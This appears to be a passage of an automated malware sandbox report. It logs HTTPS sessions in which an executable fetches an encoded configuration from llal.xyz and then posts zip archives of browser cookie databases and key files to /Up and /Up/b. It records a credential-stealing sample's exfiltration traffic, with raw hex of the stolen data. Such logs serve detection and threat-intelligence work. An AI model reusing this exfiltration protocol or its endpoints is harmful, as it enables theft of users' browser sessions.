                                                                                                                      Data Ascii: </div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      1192.168.2.1049709188.114.97.34437584C:\Users\user\Desktop\0x001900000002ab40-59.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-06-01 15:42:03 UTC210OUTGET /ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603
                                                                                                                      Host: llal.xyz
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-06-01 15:42:04 UTC575INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 01 Jun 2024 15:42:03 GMT
                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hv2F14leQl0J%2FlwjhN8c9MUMWGnm%2FVRoK6rHWjDmpVwam5aUYq6s4s%2F2Bpl2gp%2BmoQIYfUni8pOfjMN7NxhefnSfMJ4JZQ%2FzHAuqvVXnqXpxcBuQq5Mk4%2FYLAw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 88d04fb8fca446d7-DFW
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      2024-06-01 15:42:04 UTC794INData Raw: 33 37 63 65 0d 0a 51 7a 38 53 45 52 5a 62 46 51 67 54 57 7a 49 56 45 68 45 55 51 6a 30 53 45 79 41 59 46 52 49 54 57 68 73 4e 45 68 46 69 5a 47 6c 52 43 52 59 56 50 52 49 54 49 42 67 56 45 68 4e 45 47 77 30 53 45 56 78 6b 65 56 31 53 56 56 56 72 62 6e 52 76 56 31 4a 65 56 47 68 6c 64 46 70 42 62 31 56 51 62 6d 31 68 53 6c 4a 41 45 30 52 5a 51 56 4d 54 47 44 4d 58 45 68 4d 67 47 42 55 51 52 52 59 44 46 77 4d 66 43 68 67 56 45 68 45 55 47 52 56 43 58 53 49 43 46 52 42 53 58 45 74 59 58 31 59 75 58 55 31 58 45 7a 34 5a 46 78 49 54 66 52 51 2f 45 68 45 55 47 55 77 34 45 79 41 59 46 52 49 52 46 6c 63 56 43 42 4d 69 57 6d 6c 75 55 67 77 62 47 7a 67 54 49 42 67 56 45 68 45 57 53 52 55 49 45 79 4a 6b 61 58 35 65 56 31 68 62 62 6d 39 48 56 31 70 56 58 56 46 6c 61
                                                                                                                      Data Ascii: 37ceQz8SERZbFQgTWzIVEhEUQj0SEyAYFRITWhsNEhFiZGlRCRYVPRITIBgVEhNEGw0SEVxkeV1SVVVrbnRvV1JeVGhldFpBb1VQbm1hSlJAE0RZQVMTGDMXEhMgGBUQRRYDFwMfChgVEhEUGRVCXSICFRBSXEtYX1YuXU1XEz4ZFxITfRQ/EhEUGUw4EyAYFRIRFlcVCBMiWmluUgwbGzgTIBgVEhEWSRUIEyJkaX5eV1hbbm9HV1pVXVFla
                                                                                                                      2024-06-01 15:42:04 UTC1369INData Raw: 50 78 49 52 46 42 6b 58 45 68 46 30 47 67 38 53 41 42 67 7a 46 78 49 54 49 42 67 56 45 45 46 61 47 77 30 53 45 57 4e 51 52 31 31 63 55 52 64 53 53 6c 59 69 4d 68 55 53 45 52 52 45 47 7a 67 54 49 42 67 56 53 54 73 55 47 52 63 53 45 79 41 61 57 78 41 4c 46 42 74 56 62 6d 39 6a 41 42 63 65 4f 78 51 5a 46 78 49 54 49 42 70 46 45 41 73 55 47 32 74 75 66 32 39 62 56 46 35 74 61 48 35 59 58 56 52 73 58 57 6c 75 63 6c 78 4c 57 46 39 57 49 48 74 55 58 46 42 47 51 47 74 75 5a 6e 4e 64 52 78 4a 31 56 55 31 57 45 42 38 4b 47 42 55 53 45 52 51 5a 46 55 59 52 4f 68 67 45 48 6a 73 55 47 52 63 53 45 79 41 61 52 56 77 54 44 68 6b 56 55 56 74 79 56 31 68 58 48 31 46 42 55 68 41 35 49 42 67 56 45 6b 77 59 4d 78 63 53 45 79 42 44 50 78 49 52 46 42 6b 58 45 68 46 75 47 67 38
                                                                                                                      Data Ascii: PxIRFBkXEhF0Gg8SABgzFxITIBgVEEFaGw0SEWNQR11cURdSSlYiMhUSERREGzgTIBgVSTsUGRcSEyAaWxALFBtVbm9jABceOxQZFxITIBpFEAsUG2tuf29bVF5taH5YXVRsXWluclxLWF9WIHtUXFBGQGtuZnNdRxJ1VU1WEB8KGBUSERQZFUYROhgEHjsUGRcSEyAaRVwTDhkVUVtyV1hXH1FBUhA5IBgVEkwYMxcSEyBDPxIRFBkXEhFuGg8
                                                                                                                      2024-06-01 15:42:04 UTC1369INData Raw: 46 30 69 41 68 55 51 55 32 68 6c 56 41 41 42 49 68 51 2f 45 68 45 55 47 52 63 53 45 58 41 61 44 78 49 54 61 47 56 37 58 56 42 68 56 47 6c 75 63 6c 46 58 51 33 42 42 62 30 39 47 56 30 4e 6f 5a 57 4a 42 56 6e 49 59 63 56 4e 46 56 52 73 62 4f 42 4d 67 47 42 55 53 45 52 5a 4e 46 51 67 54 4d 52 51 2f 45 68 45 55 47 52 63 53 45 58 42 57 46 77 67 52 46 6c 70 53 58 45 64 69 53 6c 70 46 51 6c 46 4c 47 56 64 4c 5a 52 6f 2f 45 68 45 55 47 55 6f 65 4f 53 41 59 46 52 4a 4b 50 68 6b 58 45 68 4d 67 47 42 64 63 45 77 34 5a 46 56 42 76 58 46 73 48 41 52 4d 59 4d 78 63 53 45 79 41 59 46 52 42 42 46 67 4d 58 45 47 39 63 64 46 70 52 55 46 68 6c 61 33 46 62 63 6c 64 59 57 30 52 5a 5a 57 74 6e 51 47 56 4b 46 58 5a 51 51 46 67 56 48 6a 6b 67 47 42 55 53 45 52 51 62 51 78 41 4a
                                                                                                                      Data Ascii: F0iAhUQU2hlVAABIhQ/EhEUGRcSEXAaDxITaGV7XVBhVGluclFXQ3BBb09GV0NoZWJBVnIYcVNFVRsbOBMgGBUSERZNFQgTMRQ/EhEUGRcSEXBWFwgRFlpSXEdiSlpFQlFLGVdLZRo/EhEUGUoeOSAYFRJKPhkXEhMgGBdcEw4ZFVBvXFsHARMYMxcSEyAYFRBBFgMXEG9cdFpRUFhla3FbcldYW0RZZWtnQGVKFXZQQFgVHjkgGBUSERQbQxAJ
                                                                                                                      2024-06-01 15:42:04 UTC1369INData Raw: 52 45 47 7a 67 54 49 42 67 56 53 54 73 55 47 52 63 53 45 79 41 61 57 78 41 4c 46 42 74 56 62 6d 39 6a 43 77 4d 51 48 54 34 5a 46 78 49 54 49 42 67 58 51 68 4d 4f 47 52 56 75 62 30 78 58 56 6c 4e 64 61 47 56 30 58 56 78 33 56 31 74 75 62 58 64 57 57 45 56 63 62 6d 52 70 5a 30 4a 52 53 78 64 32 55 6e 52 5a 46 78 34 37 46 42 6b 58 45 68 4d 67 47 6b 45 51 43 78 51 49 47 7a 67 54 49 42 67 56 45 68 45 57 53 56 6b 51 43 53 41 61 56 6c 31 65 51 31 5a 5a 48 46 5a 34 58 52 63 34 45 52 51 5a 46 30 38 66 43 68 67 56 45 68 46 50 4d 78 63 53 45 79 41 59 46 52 42 66 46 67 4d 58 45 46 46 63 5a 46 59 42 42 42 59 56 50 52 49 54 49 42 67 56 45 68 4e 45 47 77 30 53 45 56 78 6b 65 56 31 53 56 56 56 72 62 6e 42 68 54 46 52 65 57 46 70 59 63 45 42 63 64 55 68 70 62 6e 4a 64 54
                                                                                                                      Data Ascii: REGzgTIBgVSTsUGRcSEyAaWxALFBtVbm9jCwMQHT4ZFxITIBgXQhMOGRVub0xXVlNdaGV0XVx3V1tubXdWWEVcbmRpZ0JRSxd2UnRZFx47FBkXEhMgGkEQCxQIGzgTIBgVEhEWSVkQCSAaVl1eQ1ZZHFZ4XRc4ERQZF08fChgVEhFPMxcSEyAYFRBfFgMXEFFcZFYBBBYVPRITIBgVEhNEGw0SEVxkeV1SVVVrbnBhTFReWFpYcEBcdUhpbnJdT
                                                                                                                      2024-06-01 15:42:04 UTC1369INData Raw: 62 45 41 73 55 47 31 56 75 62 32 4d 42 46 78 34 37 46 42 6b 58 45 68 4d 67 47 6b 55 51 43 78 51 62 61 32 35 2f 62 31 74 55 58 6d 31 6f 64 46 35 52 51 57 39 4c 57 6c 52 46 61 47 56 79 56 6c 52 6c 5a 47 6c 6e 51 6c 46 4c 46 33 5a 53 64 46 6b 58 48 6a 73 55 47 52 63 53 45 79 41 61 51 52 41 4c 46 41 67 62 4f 42 4d 67 47 42 55 53 45 52 5a 4a 57 52 41 4a 49 42 70 59 51 56 52 51 58 6c 49 63 56 6e 68 64 46 7a 67 52 46 42 6b 58 54 78 38 4b 47 42 55 53 45 55 38 7a 46 78 49 54 49 42 67 56 45 46 38 57 41 78 63 51 55 56 78 6b 56 67 4d 43 46 68 55 39 45 68 4d 67 47 42 55 53 45 30 51 62 44 52 49 52 58 47 52 6e 58 56 42 5a 55 46 6c 56 62 31 78 33 52 56 64 44 56 52 6c 6b 58 56 56 30 54 31 52 41 56 47 68 6c 65 45 4a 57 63 6c 6b 56 59 55 56 56 57 31 74 58 45 53 77 79 46 52
                                                                                                                      Data Ascii: bEAsUG1Vub2MBFx47FBkXEhMgGkUQCxQba25/b1tUXm1odF5RQW9LWlRFaGVyVlRlZGlnQlFLF3ZSdFkXHjsUGRcSEyAaQRALFAgbOBMgGBUSERZJWRAJIBpYQVRQXlIcVnhdFzgRFBkXTx8KGBUSEU8zFxITIBgVEF8WAxcQUVxkVgMCFhU9EhMgGBUSE0QbDRIRXGRnXVBZUFlVb1x3RVdDVRlkXVV0T1RAVGhleEJWclkVYUVVW1tXESwyFR
                                                                                                                      2024-06-01 15:42:04 UTC1369INData Raw: 56 79 49 43 46 52 42 51 55 6c 74 55 55 46 6c 77 57 6b 56 55 55 46 42 56 58 46 39 62 62 56 74 5a 57 6c 70 52 58 46 68 57 58 6d 46 56 56 6c 52 64 56 78 73 62 4f 42 4d 67 47 42 55 53 45 52 5a 58 46 51 67 54 49 6b 38 42 45 44 73 55 47 52 63 53 54 69 77 79 46 52 49 52 46 45 49 39 45 68 4d 67 47 42 55 53 45 31 31 64 46 51 67 54 49 6c 52 61 56 6c 4a 58 55 31 31 51 56 32 68 65 56 46 6c 51 55 56 4a 54 57 31 4a 6f 56 56 42 57 56 31 5a 51 55 6c 35 58 5a 31 46 65 45 42 30 2b 47 52 63 53 45 79 41 59 46 31 77 54 44 68 6b 56 52 51 59 69 4d 68 55 53 45 52 52 45 47 7a 67 54 49 42 67 56 53 54 73 55 47 52 63 53 45 79 41 61 58 46 59 54 44 68 6b 56 57 6c 42 6d 56 45 56 62 58 31 64 4a 52 30 4a 58 59 31 52 63 58 46 52 56 56 56 70 54 58 57 52 52 58 31 46 63 57 6c 4a 56 56 56 30
                                                                                                                      Data Ascii: VyICFRBQUltUUFlwWkVUUFBVXF9bbVtZWlpRXFhWXmFVVlRdVxsbOBMgGBUSERZXFQgTIk8BEDsUGRcSTiwyFRIRFEI9EhMgGBUSE11dFQgTIlRaVlJXU11QV2heVFlQUVJTW1JoVVBWV1ZQUl5XZ1FeEB0+GRcSEyAYF1wTDhkVRQYiMhUSERREGzgTIBgVSTsUGRcSEyAaXFYTDhkVWlBmVEVbX1dJR0JXY1RcXFRVVVpTXWRRX1FcWlJVVV0
                                                                                                                      2024-06-01 15:42:04 UTC1369INData Raw: 6c 42 56 58 46 35 68 58 46 39 62 56 46 78 54 58 31 4e 5a 59 68 6f 5a 4f 42 45 55 47 52 63 53 45 79 4a 57 46 77 67 52 46 6b 34 47 41 68 45 4b 47 42 55 53 45 55 6b 56 50 52 49 54 49 42 68 4f 4f 42 45 55 47 52 63 53 45 79 4a 52 55 52 41 4c 46 42 74 48 56 6c 52 69 57 31 35 56 56 56 70 61 57 56 70 61 61 46 52 5a 58 56 39 63 56 31 31 51 56 32 39 52 55 6c 70 57 52 46 42 61 57 52 45 73 4d 68 55 53 45 52 51 5a 46 78 42 64 49 67 49 56 45 45 59 46 43 42 55 34 45 79 41 59 46 55 38 64 50 68 6b 58 45 68 4e 37 4d 68 55 53 45 52 51 5a 46 78 42 61 5a 42 6f 50 45 68 4e 62 56 6c 78 59 58 32 4a 54 58 46 74 62 58 56 64 66 51 6c 35 75 55 6c 4e 55 55 6c 74 66 58 56 31 64 59 6c 35 58 56 56 42 62 57 68 55 65 4f 53 41 59 46 52 49 52 46 42 74 5a 45 41 6b 67 47 6b 49 44 41 78 59 7a
                                                                                                                      Data Ascii: lBVXF5hXF9bVFxTX1NZYhoZOBEUGRcSEyJWFwgRFk4GAhEKGBUSEUkVPRITIBhOOBEUGRcSEyJRURALFBtHVlRiW15VVVpaWVpaaFRZXV9cV11QV29RUlpWRFBaWREsMhUSERQZFxBdIgIVEEYFCBU4EyAYFU8dPhkXEhN7MhUSERQZFxBaZBoPEhNbVlxYX2JTXFtbXVdfQl5uUlNUUltfXV1dYl5XVVBbWhUeOSAYFRIRFBtZEAkgGkIDAxYz
                                                                                                                      2024-06-01 15:42:04 UTC1369INData Raw: 4a 5a 56 52 59 56 50 52 49 54 49 42 67 56 45 68 4e 61 47 77 30 53 45 58 63 4b 42 52 41 37 46 42 6b 58 45 6b 34 73 4d 68 55 53 45 52 52 43 50 52 49 54 49 42 67 56 45 68 4e 64 58 52 55 49 45 79 4a 52 56 31 78 55 58 6c 31 52 57 46 35 74 55 30 56 52 58 31 68 4a 55 6c 42 59 62 46 56 62 57 56 35 52 56 6c 35 61 58 47 5a 64 56 68 41 64 50 68 6b 58 45 68 4d 67 47 42 64 63 45 77 34 5a 46 55 55 42 4d 52 6f 2f 45 68 45 55 47 55 6f 65 4f 53 41 59 46 52 4a 4b 50 68 6b 58 45 68 4d 67 47 42 64 62 56 52 59 44 46 78 42 57 61 6c 70 55 58 6c 4e 56 55 6c 68 43 58 32 4e 51 57 56 56 5a 55 56 70 54 55 31 39 74 58 56 42 58 55 46 35 58 58 6c 39 62 62 52 6f 5a 4f 42 45 55 47 52 63 53 45 79 4a 57 46 77 67 52 46 6b 34 46 41 42 45 4b 47 42 55 53 45 55 6b 56 50 52 49 54 49 42 68 4f 4f
                                                                                                                      Data Ascii: JZVRYVPRITIBgVEhNaGw0SEXcKBRA7FBkXEk4sMhUSERRCPRITIBgVEhNdXRUIEyJRV1xUXl1RWF5tU0VRX1hJUlBYbFVbWV5RVl5aXGZdVhAdPhkXEhMgGBdcEw4ZFUUBMRo/EhEUGUoeOSAYFRJKPhkXEhMgGBdbVRYDFxBWalpUXlNVUlhCX2NQWVVZUVpTU19tXVBXUF5XXl9bbRoZOBEUGRcSEyJWFwgRFk4FABEKGBUSEUkVPRITIBhOO
                                                                                                                      2024-06-01 15:42:04 UTC1369INData Raw: 64 49 67 49 56 45 45 59 41 43 42 55 34 45 79 41 59 46 55 38 64 50 68 6b 58 45 68 4e 37 4d 68 55 53 45 52 51 5a 46 78 42 61 5a 42 6f 50 45 68 4e 66 55 6c 39 66 55 57 70 52 55 31 4e 61 52 46 42 63 51 6c 4a 77 58 46 78 54 56 45 52 65 58 46 5a 57 63 46 42 66 56 56 39 5a 57 42 55 65 4f 53 41 59 46 52 49 52 46 42 74 5a 45 41 6b 67 47 6b 49 47 41 78 59 7a 46 78 49 54 49 45 55 5a 4f 42 45 55 47 52 64 4a 4f 53 41 59 46 52 49 52 46 42 74 65 56 68 45 36 47 42 64 54 51 56 5a 56 55 31 4e 44 61 45 68 46 55 56 56 53 57 31 4e 63 58 57 39 66 55 56 74 61 58 46 78 57 56 46 39 70 55 56 4a 52 56 78 59 56 50 52 49 54 49 42 67 56 45 68 4e 61 47 77 30 53 45 58 63 4d 42 68 41 37 46 42 6b 58 45 6b 34 73 4d 68 55 53 45 52 52 43 50 52 49 54 49 42 67 56 45 68 4e 64 58 52 55 49 45 79
                                                                                                                      Data Ascii: dIgIVEEYACBU4EyAYFU8dPhkXEhN7MhUSERQZFxBaZBoPEhNfUl9fUWpRU1NaRFBcQlJwXFxTVEReXFZWcFBfVV9ZWBUeOSAYFRIRFBtZEAkgGkIGAxYzFxITIEUZOBEUGRdJOSAYFRIRFBteVhE6GBdTQVZVU1NDaEhFUVVSW1NcXW9fUVtaXFxWVF9pUVJRVxYVPRITIBgVEhNaGw0SEXcMBhA7FBkXEk4sMhUSERRCPRITIBgVEhNdXRUIEy
                                                                                                                      2024-06-01 15:42:04 UTC1369INData Raw: 47 55 6f 65 4f 53 41 59 46 52 4a 4b 50 68 6b 58 45 68 4d 67 47 42 64 62 56 52 59 44 46 78 42 63 62 6c 6c 46 58 46 39 53 56 45 64 59 58 6d 4a 56 55 56 46 59 52 46 56 62 58 46 6c 74 55 6c 46 59 56 31 74 58 55 56 68 58 62 52 6f 5a 4f 42 45 55 47 52 63 53 45 79 4a 57 46 77 67 52 46 6b 34 43 42 78 45 4b 47 42 55 53 45 55 6b 56 50 52 49 54 49 42 68 4f 4f 42 45 55 47 52 63 53 45 79 4a 52 55 52 41 4c 46 42 74 55 56 46 64 73 58 46 6c 58 57 31 68 61 55 46 42 55 62 31 52 5a 58 46 4e 62 56 31 31 56 58 32 46 63 52 56 56 55 57 31 35 57 55 42 45 73 4d 68 55 53 45 52 51 5a 46 78 42 64 49 67 49 56 45 45 59 42 44 78 55 34 45 79 41 59 46 55 38 64 50 68 6b 58 45 68 4e 37 4d 68 55 53 45 52 51 5a 46 78 42 61 5a 42 6f 50 45 68 4e 56 57 31 74 51 55 6d 64 53 55 45 4a 55 56 31 64
                                                                                                                      Data Ascii: GUoeOSAYFRJKPhkXEhMgGBdbVRYDFxBcbllFXF9SVEdYXmJVUVFYRFVbXFltUlFYV1tXUVhXbRoZOBEUGRcSEyJWFwgRFk4CBxEKGBUSEUkVPRITIBhOOBEUGRcSEyJRURALFBtUVFdsXFlXW1haUFBUb1RZXFNbV11VX2FcRVVUW15WUBEsMhUSERQZFxBdIgIVEEYBDxU4EyAYFU8dPhkXEhN7MhUSERQZFxBaZBoPEhNVW1tQUmdSUEJUV1d


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      2192.168.2.1049710188.114.97.34437584C:\Users\user\Desktop\0x001900000002ab40-59.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-06-01 15:42:04 UTC161OUTPOST /Up HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream; boundary=----
                                                                                                                      User-Agent: MyApp/1.0
                                                                                                                      Host: llal.xyz
                                                                                                                      Content-Length: 343
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-06-01 15:42:04 UTC331OUTData Raw: 50 4b 03 04 14 00 08 08 08 00 41 5d c1 58 00 00 00 00 00 00 00 00 00 00 00 00 28 00 04 00 32 61 65 39 37 37 66 34 2d 64 62 31 32 2d 34 38 37 36 2d 39 65 34 64 2d 66 63 38 64 31 37 37 38 38 34 32 64 2e 74 78 74 01 00 00 00 7d 8d 31 0e c2 30 10 04 bf 62 6d ed c2 67 8c 93 5c 89 68 69 68 28 10 45 e4 18 64 09 c5 e8 8c 20 12 e2 ef b9 17 a4 dc d9 d5 ce 0f 23 18 4b 0c b0 48 60 6f f1 00 5f 71 2a 49 6a ab f7 b7 39 8c ad 24 73 ce f3 94 c5 1c a5 7c b2 e8 74 bb bf 59 3c c1 d4 51 e7 a3 df 51 6f 51 55 72 29 f3 54 bf cd 90 d3 83 97 82 81 5c 0c 51 83 80 83 1b f6 16 4d 29 f9 de 2d e4 7c c0 7f 05 50 4b 07 08 78 0d ad 13 79 00 00 00 00 00 00 00 9d 00 00 00 00 00 00 00 50 4b 01 02 00 00 14 00 08 08 08 00 41 5d c1 58 78 0d ad 13 79 00 00 00 9d 00 00 00 28 00 04 00 00 00 00 00
                                                                                                                      Data Ascii: PKA]X(2ae977f4-db12-4876-9e4d-fc8d1778842d.txt}10bmg\hih(Ed #KH`o_q*Ij9$s|tY<QQoQUr)T\QM)-|PKxyPKA]Xxy(
                                                                                                                      2024-06-01 15:42:04 UTC12OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a
                                                                                                                      Data Ascii: --------
                                                                                                                      2024-06-01 15:42:05 UTC519INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 01 Jun 2024 15:42:05 GMT
                                                                                                                      Content-Length: 0
                                                                                                                      Connection: close
                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tR8Mssm7Ki7RZPgL4IPOe%2F5elDZEZs%2FkkcjTwCKNqG2jcxg3rojTdsBAKtz5KeOqP6UU27%2FGIyCAiEdtRZVREFSKLOGvHskpJHOXQkBQ33tWLTLOwa0UF9FhBg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 88d04fc1ab3b463e-DFW
                                                                                                                      alt-svc: h3=":443"; ma=86400


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      3192.168.2.1049711188.114.97.34437584C:\Users\user\Desktop\0x001900000002ab40-59.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-06-01 15:42:07 UTC252OUTPOST /Up/b HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream; boundary=----
                                                                                                                      User-Agent: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603
                                                                                                                      Host: llal.xyz
                                                                                                                      Content-Length: 7745
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-06-01 15:42:07 UTC7733OUTData Raw: 50 4b 03 04 14 00 08 08 08 00 42 5d c1 58 00 00 00 00 00 00 00 00 00 00 00 00 08 00 04 00 62 2f 63 38 2f 6b 65 79 01 00 00 00 01 20 00 df ff 83 61 a9 aa bf 68 a4 9b e4 1b d7 fb b2 ec de fd 5c 34 fb 85 05 64 18 43 bf c6 63 4f ec 62 b6 83 50 4b 07 08 24 24 a0 5d 25 00 00 00 00 00 00 00 20 00 00 00 00 00 00 00 50 4b 03 04 14 00 08 08 08 00 42 5d c1 58 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 00 62 2f 63 38 2f 30 2f 43 6f 6f 6b 69 65 73 31 01 00 00 00 ed d9 6d 4c 1b 65 1c 00 f0 7b 29 d0 4e ca 81 d8 31 a8 c6 0b 5d 14 22 b4 16 36 b3 04 75 14 68 18 ac b6 d0 15 61 ce 78 9c e5 4a 8f b5 bd e3 ee ca 86 1f a6 88 26 bc f8 01 83 d1 e8 5e 92 39 59 c6 02 51 12 e3 1c 2c 18 67 96 48 36 19 1f 1a 33 93 99 ec 45 5d a2 c2 e8 62 36 be e9 73 d0 ae 50 4a fc b2 0f 5b f2 ff a5
                                                                                                                      Data Ascii: PKB]Xb/c8/key ah\4dCcObPK$$]% PKB]Xb/c8/0/Cookies1mLe{)N1]"6uhaxJ&^9YQ,gH63E]b6sPJ[
                                                                                                                      2024-06-01 15:42:07 UTC12OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a
                                                                                                                      Data Ascii: --------
                                                                                                                      2024-06-01 15:42:07 UTC521INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 01 Jun 2024 15:42:07 GMT
                                                                                                                      Content-Length: 0
                                                                                                                      Connection: close
                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wJlLzymQDyDfdn1GqHtv4l%2B6UAm3tZtY%2BWmxVO7kecdTHm8vCJUntcnlz8TV5GGkUsi%2FL9E9Ti0dHbLkGe7%2B4CounK3v28O1bPAM2ckkuYqrVh4TL1pASOlbcA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 88d04fcf89946b53-DFW
                                                                                                                      alt-svc: h3=":443"; ma=86400


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      4192.168.2.1049712188.114.97.34437584C:\Users\user\Desktop\0x001900000002ab40-59.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-06-01 15:42:09 UTC253OUTPOST /Up/b HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream; boundary=----
                                                                                                                      User-Agent: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603
                                                                                                                      Host: llal.xyz
                                                                                                                      Content-Length: 11629
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-06-01 15:42:09 UTC11617OUTData Raw: 50 4b 03 04 14 00 08 08 08 00 43 5d c1 58 00 00 00 00 00 00 00 00 00 00 00 00 08 00 04 00 62 2f 63 39 2f 6b 65 79 01 00 00 00 01 20 00 df ff 73 63 6b f3 82 92 4d 94 20 63 83 d3 73 4e 3d 58 3b d9 de b5 0a 65 ab 76 f7 97 ae bf 92 37 b2 03 50 4b 07 08 0f d2 4b b8 25 00 00 00 00 00 00 00 20 00 00 00 00 00 00 00 50 4b 03 04 14 00 08 08 08 00 43 5d c1 58 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 00 62 2f 63 39 2f 30 2f 43 6f 6f 6b 69 65 73 31 01 00 00 00 ed d9 3d 6f d3 40 18 07 f0 73 9c 34 50 12 dc 0e 55 86 30 9c 5a 24 5a 29 bc 54 11 12 52 17 d2 d6 94 88 90 d0 90 a0 76 b2 ae ce b5 31 4d 6c f7 7c 2e cd d8 a1 03 4b 3f 01 5f 80 91 af c0 c6 04 1f 81 85 15 89 8d 11 5f 9a 36 a1 75 40 42 aa 84 aa ff 4f 72 62 df 73 39 bf e4 c9 29 7e fc 72 bd e2 48 4e b7 3d d1 65 92
                                                                                                                      Data Ascii: PKC]Xb/c9/key sckM csN=X;ev7PKK% PKC]Xb/c9/0/Cookies1=o@s4PU0Z$Z)TRv1Ml|.K?__6u@BOrbs9)~rHN=e
                                                                                                                      2024-06-01 15:42:09 UTC12OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a
                                                                                                                      Data Ascii: --------
                                                                                                                      2024-06-01 15:42:09 UTC523INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 01 Jun 2024 15:42:09 GMT
                                                                                                                      Content-Length: 0
                                                                                                                      Connection: close
                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NkJ5M%2Fw3CQjh%2FErrNQlfuZOInLE1H%2BhMIoXHqy35TZTjug%2BdTXYRQ2vzKzcnZn4QHzNGJOojZ7LEVUI8YKN4D6NyzRmWsXbxeD29Q659UzZrFFn%2BrMoFTc4bqA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 88d04fdcea646c51-DFW
                                                                                                                      alt-svc: h3=":443"; ma=86400


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      5192.168.2.1049713188.114.97.34437584C:\Users\user\Desktop\0x001900000002ab40-59.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-06-01 15:42:11 UTC252OUTPOST /Up/b HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream; boundary=----
                                                                                                                      User-Agent: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603
                                                                                                                      Host: llal.xyz
                                                                                                                      Content-Length: 9177
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-06-01 15:42:11 UTC9165OUTData Raw: 50 4b 03 04 14 00 08 08 08 00 44 5d c1 58 00 00 00 00 00 00 00 00 00 00 00 00 15 00 04 00 62 2f 67 31 2f 30 2f 63 6f 6f 6b 69 65 73 2e 73 71 6c 69 74 65 01 00 00 00 ed d2 4f 4f d4 40 14 00 f0 b2 18 35 46 cf 5e 27 e1 20 24 1b a3 31 de 5d b0 2a 71 01 d9 5d 12 39 91 b2 54 a9 2e 5b 68 bb 82 26 04 12 13 bf 97 df c0 6f c2 d5 a3 e5 af ab 12 ce 26 fc 7e c9 4c de cc 6b a6 af af d3 5d 6e 67 55 1a de e5 c5 56 52 85 27 d1 61 d4 68 44 cf 42 88 a2 68 f2 6c 9c 9b a8 c7 8d bf d6 77 a3 ab 4d 46 0f 3f fc b8 77 f0 33 6a ec 1f 45 fb 47 07 df 23 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 ff c3 d7 a5 89 5b f7 a7 a6 26 be a5 55 b2 3e 48 b7 f2 2f 6b fd 3c ff 98 a5 e5 58 d8 98 eb c4 ad 5e 1c 7a ad d9 76 1c c6 12 61 3a db 08 f3 8b
                                                                                                                      Data Ascii: PKD]Xb/g1/0/cookies.sqliteOO@5F^' $1]*q]9T.[h&o&~Lk]ngUVR'ahDBhlwMF?w3jEG#[&U>H/k<X^zva:
